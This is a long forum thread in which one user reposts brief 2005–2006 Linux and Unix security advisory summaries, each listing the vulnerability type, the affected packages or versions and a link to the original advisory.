eddie


----------



## eddie5659

FreeBSD versions 5.3 and 5.4 could allow a remote attacker to bypass security restrictions caused by a programming error in the implementation of the AES-XCBC-MAC algorithm used for authentication. If the AES-XCBC-MAC algorithm is used without any encryption, a remote attacker could forge packets to appear as if the packets orginated from a different system to establish an IPsec session. This would allow the attacker to gain unauthorized access to sensitive information or possibly gain elevated privileges on the system.

*Platforms Affected:

FreeBSD Project: FreeBSD 5.4 
FreeBSD, Inc: FreeBSD 5.3 
*

http://xforce.iss.net/xforce/xfdb/21551

Regards

eddie


----------



## eddie5659

GForge is a team collaboration and repository program for Linux operating systems. GForge version 4.5 and possibly other versions are vulnerable to cross-site scripting caused by improper validation of user-supplied input. A remote attacker could create a specially-crafted URL to multiple parameters in a URL request to the forum.php, task.php, detail.php, search/.php, and qrs.php scripts, including fields within the login form which, once the URL is clicked, would be executed in the victim's Web browser within the security context of the hosting site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

*Platforms Affected:

GForge: GForge 4.5 
Linux: Linux Any version *

http://xforce.iss.net/xforce/xfdb/21558

Regards

eddie


----------



## eddie5659

zlib is vulnerable to a buffer overflow which could potentially lead to execution of arbitrary code

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-libs/zlib < 1.2.3 >= 1.2.3

*

http://www.linuxsecurity.com/content/view/119946/104/

Regards

eddie


----------



## eddie5659

A vulnerability in Shorewall allows clients authenticated by MAC address filtering to bypass all other security rules.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-firewall/shorewall < 2.4.1 *>= 2.2.5
>= 2.4.1
*

http://www.linuxsecurity.com/content/view/119945/104/

Regards

eddie


----------



## eddie5659

The sandbox utility may create temporary files in an insecure manner.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-apps/sandbox < 1.2.11 >= 1.2.11

*

http://www.linuxsecurity.com/content/view/119951/104/

Regards

eddie


----------



## eddie5659

Clam AntiVirus is vulnerable to integer overflows when handling several file formats, potentially resulting in the execution of arbitrary code

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-antivirus/clamav < 0.86.2 >= 0.86.2

*

http://www.linuxsecurity.com/content/view/119950/104/

Regards

eddie


----------



## eddie5659

Several vulnerabilities in the Mozilla Suite allow attacks ranging from the execution of javascript code with elevated privileges to inormation leakage.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/mozilla < 1.7.10 >= 1.7.10
2 www-client/mozilla-bin < 1.7.10 >= 1.7.10
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/content/view/119949/104/

Regards

eddie


----------



## eddie5659

Wine is an open-source application for Unix-based operating systems that loads and executes a Windows binary, including a set of libraries. Wine version 20050725 and possibly other versions are vulnerable to a symlink attack caused by insecure file permissions in the /tmp directory created by winelauncher.in. A local attacker could exploit this vulnerability by creating a symbolic link from a temporary file to other files on the system which would allow the attacker to create or overwrite arbitrary files on the system with the privileges of the victim.

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
Wine: Wine 20050725 
*

http://xforce.iss.net/xforce/xfdb/21732

Regards

eddie


----------



## eddie5659

Updated ruby packages that fix an arbitrary command execution issue are now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/120035/110/

eddie


----------



## eddie5659

This update fixes a problem with ttmkfdir not including native encodings of Asian TrueType fonts in fonts.scale files used by the X font server. Users of Chinese, Japanese, and Korean fonts are recommended to reinstall the font packages for these languages after updating ttmkfdir

*Product : Fedora Core 3
Name : ttmkfdir
Version : 3.0.9 
Release : 14.1 *

http://www.linuxsecurity.com/content/view/120038/102/

eddie


----------



## eddie5659

This update fixes a problem with ttmkfdir not including native encodings of Asian TrueType fonts in fonts.scale files used by the X font server. Users of Chinese, Japanese, and Korean fonts are recommended to reinstall the font packages for these languages after updating ttmkfdir

*Product : Fedora Core 4
Name : ttmkfdir
Version : 3.0.9 
Release : 16.1 *

http://www.linuxsecurity.com/content/view/120037/102/

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : selinux-policy-targeted
Version : 1.25.3 
Release : 12 *

http://www.linuxsecurity.com/content/view/120040/102/

eddie


----------



## eddie5659

Heartbeat is vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-cluster/heartbeat < 1.2.3-r1 >= 1.2.3-r1

*

http://www.linuxsecurity.com/content/view/120041/104/

eddie


----------



## eddie5659

Kismet is an 802.11b wireless sniffing tool that is compatible with any wireless card supported in Linux. Kismet versions prior to 2005-08-R1 are vulnerable to a heap corruption caused by an integer underflow in the CDP protocol dissector. A remote attacker could use this vulnerability to corrupt the heap and execute arbitrary code on the system.

*Platforms Affected:

Linux: Linux Any version 
Mike Kershaw: Kismet prior to 2005-08-R1 *

http://xforce.iss.net/xforce/xfdb/21853

eddie


----------



## eddie5659

The Operator Shell (osh) is a setuid root shell used by administrators to restrict users actions. osh version 1.7 is vulnerable to a buffer overflow in the temp3[] function. A local attacker using a long directory name combined with a long file name to total more than 255 bytes could cause a buffer overflow and execute arbitrary code on the system.

*Platforms Affected:

Debian: Osh 1.7 
Linux: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/21852

eddie


----------



## eddie5659

Kismet is an 802.11b wireless sniffing tool that is compatible with any wireless card supported in Linux. Kismet versions prior to 2005-08-R1 are vulnerable to an unspecified vulnerability in the handling of unprintable characters in the (SSID) Student Services Information Desk.

*Platforms Affected:

Linux: Linux Any version 
Mike Kershaw: Kismet prior to 2005-08-R1 
*

http://xforce.iss.net/xforce/xfdb/21851

eddie


----------



## eddie5659

AWStats fails to validate certain log input, which could lead to the execution of arbitrary Perl code during the generation of the statistics

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/awstats < 6.5 >= 6.5
*

http://www.linuxsecurity.com/content/view/120122/104/

eddie


----------



## eddie5659

Xpdf, Kpdf and GPdf may crash as a result of a Denial of Service vulnerability

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/xpdf < 3.00-r10 >= 3.00-r10
2 kde-base/kdegraphics < 3.3.2-r3 >= 3.3.2-r3
3 kde-base/kpdf < 3.4.1-r1 >= 3.4.1-r1
4 app-text/gpdf < 2.10.0-r1 >= 2.10.0-r1
-------------------------------------------------------------------
4 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/content/view/120123/104/

eddie


----------



## eddie5659

Updated package.

http://www.linuxsecurity.com/content/view/120124/100/

eddie


----------



## eddie5659

Updated acroread packages that fix a security issue are now available. This update has been rated as having critical security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/120125/110/

eddie


----------



## eddie5659

Updated package.

http://www.linuxsecurity.com/content/view/120126/100/

eddie


----------



## eddie5659

Hiya

This thread will be at the top for all of January. For any previous months, I've created a new thread here:

http://forums.techguy.org/unix-linux/225642-linux-unix-vulnerabilities.html

However, this is just from April 2004. Any previous ones are on their own

Regards

eddie


----------



## eddie5659

*Mandriva: Updated pdftohtml packages fix several vulnerabilities *

Heap-based buffer overflow in the StreamPredictor function in Xpdf 3.01 allows remote attackers to execute arbitrary code via a PDF file with an out-of-range numComps (number of components) field. (CVE-2005-3192) Heap-based buffer overflow in the JPXStream::readCodestream function in the JPX stream parsing code (JPXStream.c) for xpdf 3.01 and earlier allows user-complicit attackers to cause a denial of service (heap corruption) and possibly execute arbitrary code via a crafted PDF file with large size values that cause insufficient memory to be allocated.

http://www.linuxsecurity.com/content/view/121173/106/

eddie


----------



## eddie5659

*Mandriva: New libpaper1 packages provide libpaper1 to x86_64 platform *

Corporte Desktop 3.0/x86_64 did not ship with the libpaper1 library which prevented the included gpdf and kpdf programs from working. This update provides libpaper1.

http://www.linuxsecurity.com/content/view/121174/106/

eddie


----------



## eddie5659

*Mandriva: Updated xpdf packages fix several vulnerabilities *

Multiple heap-based buffer overflows in the DCTStream::readProgressiveSOF and DCTStream::readBaselineSOF functions in the DCT stream parsing code (Stream.cc) in xpdf 3.01 and earlier, allow user-complicit attackers to cause a denial of service (heap corruption) and possibly execute arbitrary code via a crafted PDF file with an out-of-range number of components (numComps), which is used as an array index. (CVE-2005-3191)

http://www.linuxsecurity.com/content/view/121175/106/

eddie


----------



## eddie5659

*Mandriva: Updated gpdf packages fix several vulnerabilities *

Multiple heap-based buffer overflows in the DCTStream::readProgressiveSOF and DCTStream::readBaselineSOF functions in the DCT stream parsing code (Stream.cc) in xpdf 3.01 and earlier, allow user-complicit attackers to cause a denial of service (heap corruption) and possibly execute arbitrary code via a crafted PDF file with an out-of-range number of components (numComps), which is used as an array index. (CVE-2005-3191)

http://www.linuxsecurity.com/content/view/121176/106/

eddie


----------



## eddie5659

*Mandriva: Updated apache2 packages fix vulnerabilities *

A flaw was discovered in mod_imap when using the Referer directive with image maps that could be used by a remote attacker to perform a cross- site scripting attack, in certain site configurations, if a victim could be forced to visit a malicious URL using certain web browsers(CVE-2005-3352).

http://www.linuxsecurity.com/content/view/121177/106/

eddie


----------



## eddie5659

*Apache mod_auth_pgsql module multiple syslog format strings*

The mod_auth_pgsql module for Apache provides user authentication and logging functionality for PostgreSQL databases. mod_auth_pgsql versions 2.0.1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by multiple format string vulnerabilities in the logging functionality. A remote attacker could exploit this vulnerability to execute arbitrary command on the system with privileges of the Apache Web server process.

*Platforms Affected:

Guiseppe Tanzilli and Matthias Eckermann: mod_auth_pgsql 2.0.1 and earlier 
Red Hat, Inc.: Red Hat Desktop 3 
Red hat, Inc.: Red Hat Desktop 4 
Red Hat, Inc.: Red Hat Enterprise Linux AS 3 
Red Hat, Inc.: Red Hat Enterprise Linux AS 4 
Red Hat, Inc.: Red Hat Enterprise Linux ES 3 
Red Hat, Inc.: Red Hat Enterprise Linux ES 4 
Red Hat, Inc.: Red Hat Enterprise Linux WS 3 
Red Hat, Inc.: Red Hat Enterprise Linux WS 4 
*

http://xforce.iss.net/xforce/xfdb/24003

eddie


----------



## eddie5659

*Gentoo: HylaFAX Multiple vulnerabilities *

HylaFAX is vulnerable to arbitrary code execution and unauthorized
access vulnerabilities

http://www.linuxsecurity.com/content/view/121181/104/

eddie


----------



## eddie5659

*RedHat: Low: struts security update for Red Hat Application Server *

Updated Red Hat Application Server components are now available including a security update for Struts. This update has been rated as having low security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Application Server 3AS - noarch
Red Hat Application Server 3ES - noarch
Red Hat Application Server 3WS - noarch*

http://www.linuxsecurity.com/content/view/121224/110/

eddie


----------



## eddie5659

*RedHat: Important: cups security update *

Updated CUPS packages that fix multiple security issues are now available for Red Hat Enterprise Linux. This update has been rated as having important security impact by the Red Hat Security Response Team

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/121225/110/

eddie


----------



## eddie5659

*RedHat: Important: gpdf security update *

An updated gpdf package that fixes several security issues is now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/121226/110/

eddie


----------



## eddie5659

*RedHat: Moderate: apache security update *

Updated Apache httpd packages that correct a security issue are now available for Red Hat Enterprise Linux 2.1. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
*

http://www.linuxsecurity.com/content/view/121227/110/

eddie


----------



## eddie5659

*RedHat: Important: kernel security update *

Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 4 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, noarch, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, noarch, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, noarch, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, noarch, x86_64
*

http://www.linuxsecurity.com/content/view/121228/110/

eddie


----------



## eddie5659

*Novell SUSE Remote Manager buffer overflow*

Novell SUSE Open Enterprise Server version 9.0, and possible other versions, is vulnerable to a heap-based buffer overflow in the Novell Remote Manager service (novell-nrm). By sending an HTTP request with a negative Content-Length header, a remote attacker could overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Novell: Novell Open Enterprise Server Any version 
SuSE: SuSE Linux Enterprise Server 9 
*

http://xforce.iss.net/xforce/xfdb/24111

eddie


----------



## eddie5659

Hiya

After a much needed long break, I've deceided to bring this thread back. All previous ones can be found here:

http://forums.techguy.org/unix-linux/430115-linux-vulnerabilities.html

eddie


----------



## eddie5659

An integer overflow was discovered in the DOC file parser of the wv library. By tricking a user into opening a specially crafted MSWord (.DOC) file, remote attackers could execute arbitrary code with the user's privileges.

*Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125526/170/

eddie


----------



## eddie5659

Stefan Esser discovered two buffer overflows in the htmlentities() and htmlspecialchars() functions. By supplying specially crafted input to PHP applications which process that input with these functions, a remote attacker could potentially exploit this to execute arbitrary code with the privileges of the application. (CVE-2006-5465) This update also fixes bugs in the chdir() and tempnam() functions, which did not perform proper open_basedir checks. This could allow local scripts to bypass intended restrictions.

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125548/170/

eddie


----------



## eddie5659

M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges.

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125565/170/

eddie


----------



## eddie5659

Derek Abdine discovered that the NVIDIA Xorg driver did not correctly verify the size of buffers used to render text glyphs. When displaying very long strings of text, the Xorg server would crash. If a user were tricked into viewing a specially crafted series of glyphs, this flaw could be exploited to run arbitrary code with root privileges.

*Affected versions

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125566/170/

eddie


----------



## eddie5659

An error was found in the RPM library's handling of query reports. In some locales, certain RPM packages would cause the library to crash. If a user was tricked into querying a specially crafted RPM package, the flaw could be exploited to execute arbitrary code with the user's privileges.

*Affected versions

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.*

http://www.linuxsecurity.com/content/view/125567/170/

eddie


----------



## eddie5659

USN-376-1 provided an update to imlib2 to fix several security vulnerabilities. Unfortunately the update broke JPG file handling in certain situations. This update corrects this problem. We apologize for the inconvenience

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.*

http://www.linuxsecurity.com/content/view/125604/170/

eddie


----------



## eddie5659

Miloslav Trmac discovered a buffer overflow in texinfo's index processor. If a user is tricked into processing a .texi file with texindex, this could lead to arbitrary code execution with user privileges.

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.*

http://www.linuxsecurity.com/content/view/125671/170/

eddie


----------



## eddie5659

The Linux kernel in our old Linux 2.4 kernel based distributions have been updated to fix various security issues and bugs.

*Products:

SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
UnitedLinux 1.0
*

http://www.linuxsecurity.com/content/view/125685/170/

eddie


----------



## eddie5659

This addresses an issue with the way screen handles UTF-8 character encoding that could allow screen to be crashed (or possibly code to be executed in the context of the screen user) if a specially crafted sequence of pseudo-UTF-8 characters are displayed withing a screen session.

*Affected versions

Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, and 11.0*

http://www.linuxsecurity.com/content/view/125568/170/

eddie


----------



## eddie5659

This release "includes a large number of new features, bug fixes and security enhancements." In particular, when the UTF-8 charset is selected there are buffer overflows in the htmlspecialchars() and htmlentities() that may be exploited to execute arbitrary code.

*Affected versions

Slackware 10.2 and 11.0*

http://www.linuxsecurity.com/content/view/125569/170/

eddie


----------



## eddie5659

The minimum OpenSSL version was raised to OpenSSL 0.9.7l and OpenSSL 0.9.8d to avoid exposure to known security flaws in older versions (these patches were already issued for Slackware). If you have not upgraded yet, get those as well to prevent a potentially exploitable security problem in named.

*Affected versions

Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, and 11.0*

http://www.linuxsecurity.com/content/view/125608/170/

eddie


----------



## eddie5659

New Firefox and Thunderbird packages are available for Slackware 10.2 and 11.0 to fix security issues. In addition, a new Seamonkey package is available for Slackware 11.0 to fix similar issues.

*Affected versions

Slackware 10.2 and 11.0 *

http://www.linuxsecurity.com/content/view/125682/170/

eddie


----------



## eddie5659

Several flaws were found in the way Firefox processes certain malformed Javascript code. A malicious web page could cause the execution of Javascript code in such a way that could cause Firefox to crash or execute arbitrary code as the user running Firefox.

Several flaws were found in the way Firefox renders web pages. A malicious web page could cause the browser to crash or possibly execute arbitrary code as the user running Firefox.

A flaw was found in the way Firefox verifies RSA signatures. For RSA keys with exponent 3 it is possible for an attacker to forge a signature that would be incorrectly verified by the NSS library. Firefox as shipped trusts several root Certificate Authorities that use exponent 3. An attacker could have created a carefully crafted SSL certificate which be incorrectly
trusted when their site was visited by a victim.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125627/170/

eddie


----------



## eddie5659

Texinfo is a documentation system that can produce both online information and printed output from a single source file.

A buffer overflow flaw was found in Texinfo's texindex command. An attacker could construct a carefully crafted Texinfo file that could cause texindex to crash or possibly execute arbitrary code when opened.

A flaw was found in the way Texinfo's texindex command creates temporary files. A local user could leverage this flaw to overwrite files the user executing texindex has write access to.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125630/170/

eddie


----------



## eddie5659

Several flaws were found in the way Thunderbird processes certain malformed Javascript code. A malicious HTML mail message could cause the execution of Javascript code in such a way that could cause Thunderbird to crash or execute arbitrary code as the user running Thunderbird.

Several flaws were found in the way Thunderbird renders HTML mail messages. A malicious HTML mail message could cause the mail client to crash or possibly execute arbitrary code as the user running Thunderbird.

A flaw was found in the way Thunderbird verifies RSA signatures. For RSA keys with exponent 3 it is possible for an attacker to forge a signature that would be incorrectly verified by the NSS library. Thunderbird as shipped trusts several root Certificate Authorities that use exponent 3. An attacker could have created a carefully crafted SSL certificate which would be incorrectly trusted when their site was visited by a victim. This flaw was previously thought to be fixed in Thunderbird 1.5.0.7, however Ulrich
Kuehn discovered the fix was incomplete

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64

*

http://www.linuxsecurity.com/content/view/125629/170/

eddie


----------



## eddie5659

Several flaws were found in the way SeaMonkey processes certain malformed Javascript code. A malicious web page could cause the execution of Javascript code in such a way that could cause SeaMonkey to crash or execute arbitrary code as the user running SeaMonkey.

Several flaws were found in the way SeaMonkey renders web pages. A malicious web page could cause the browser to crash or possibly execute arbitrary code as the user running SeaMonkey.

A flaw was found in the way SeaMonkey verifies RSA signatures. For RSA keys with exponent 3 it is possible for an attacker to forge a signature that would be incorrectly verified by the NSS library. SeaMonkey as shipped trusts several root Certificate Authorities that use exponent 3. An attacker could have created a carefully crafted SSL certificate which be incorrectly trusted when their site was visited by a victim. This flaw was previously thought to be fixed in SeaMonkey 1.0.5, however Ulrich Kuehn
discovered the fix was incomplete

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125628/170/

eddie


----------



## eddie5659

A flaw was discovered in the way Ruby's CGI module handles certain multipart/form-data MIME data. If a remote attacker sends a specially crafted multipart-form-data request, it is possible to cause the ruby CGI script to enter an infinite loop, causing a denial of service.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125646/170/

eddie


----------



## eddie5659

Several flaws were found in Wireshark's HTTP, WBXML, LDAP, and XOT protocol dissectors. Wireshark could crash or stop responding if it read a malformed packet off the network.

A single NULL byte heap based buffer overflow was found in Wireshark's MIME Multipart dissector. Wireshark could crash or possibly execute arbitrary arbitrary code as the user running Wireshark.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125672/170/

eddie


----------



## eddie5659

The Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.

*Relevant releases/architectures:

Red Hat Application Stack v1 for Enterprise Linux AS (v.4) - i386, x86_64
Red Hat Application Stack v1 for Enterprise Linux ES (v.4) - i386, x86_64
*

http://www.linuxsecurity.com/content/view/125683/170/

eddie


----------



## eddie5659

Miloslav Trmac discovered a buffer overflow in texinfo. This issue can cause texi2dvi or texindex to crash when processing a carefully crafted file.

*Affected versions

2006.0, 2007.0, Corporate 3.0, Corporate 4.0*

http://www.linuxsecurity.com/content/view/125645/170/

eddie


----------



## eddie5659

A vulnerability in the privilege separation functionality in OpenSSH was discovered, caused by an incorrect checking for bad signatures in sshd's privsep monitor. As a result, the monitor and the unprivileged process can get out sync. The OpenSSH team indicated that this bug is not known to be exploitable in the abence of additional vulnerabilities.

*Affected versions

2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0*

http://www.linuxsecurity.com/content/view/125650/170/

eddie


----------



## eddie5659

An error in gnuplot was causing it to fail with a segmentation fault whenever the user attempted to produce a graphical plot via the default 'x11' term. The updated package corrects this error and allows graphical plotting via X11.

*Affected: 2007.0*

http://www.linuxsecurity.com/content/view/125678/170/

eddie


----------



## eddie5659

A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 1.5.0.8. This update provides the latest Firefox to correct these issues.

*Affected versions

2007.0, Corporate 3.0, Corporate 4.0
*

http://www.linuxsecurity.com/content/view/125679/170/

eddie


----------



## eddie5659

There were some problems with the menu system in Mandriva Linux 2007. Some menu categories were not displayed or properly translated, and editing the menus with the GNOME menu editor (alacarte) was not working. This update fixes these problems.

*Affected: 2007.0
*

http://www.linuxsecurity.com/content/view/125680/170/

eddie


----------



## eddie5659

A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 1.5.0.8. This update provides the latest Thunderbird to correct these issues.

*Affected: 2007.0, Corporate 3.0
*

http://www.linuxsecurity.com/content/view/125681/170/

eddie


----------



## eddie5659

The Ical package in Mandriva Linux 2007 fails to run due to old code that does not work with current versions of TCL. Additionally, the application did not appear in the menu and the URL was obsolete. This updated package fixes these issues.

*Affected: 2007.0
*

http://www.linuxsecurity.com/content/view/125688/170/

eddie


----------



## eddie5659

Screen contains an error in its UTF-8 character handling code that would allow a remote Denial of Service or possibly the remote execution of arbitrary code.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-misc/screen < 4.0.3 > 4.0.3=*

http://www.linuxsecurity.com/content/view/125554/170/

eddie


----------



## eddie5659

An integer overflow flaw in the Qt pixmap handling could possibly lead to a Denial of Service or the remote execution of arbitrary code.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-libs/qt < 4.1.4-r2 > 4.1.4-r2=

*>3.3.6-r4=*

http://www.linuxsecurity.com/content/view/125574/170/

eddie


----------



## eddie5659

The NVIDIA binary graphics driver is vulnerable to a local privilege escalation through an X session.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-drivers/nvidia-drivers < 1.0.8776 >= 1.0.8776
< 1.0-8762
*

http://www.linuxsecurity.com/content/view/125617/170/

eddie


----------



## eddie5659

Bugzilla is vulnerable to cross-site scripting, script injection, and request forgery.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/bugzilla < 2.18.6 >2.18.6*

http://www.linuxsecurity.com/content/view/125676/170/

eddie


----------



## eddie5659

An incorrect seteuid() call could allow an FTP user to access some files or directories that would normally be inaccessible.

*Affected packages
=================

-------------------------------------------------------------------
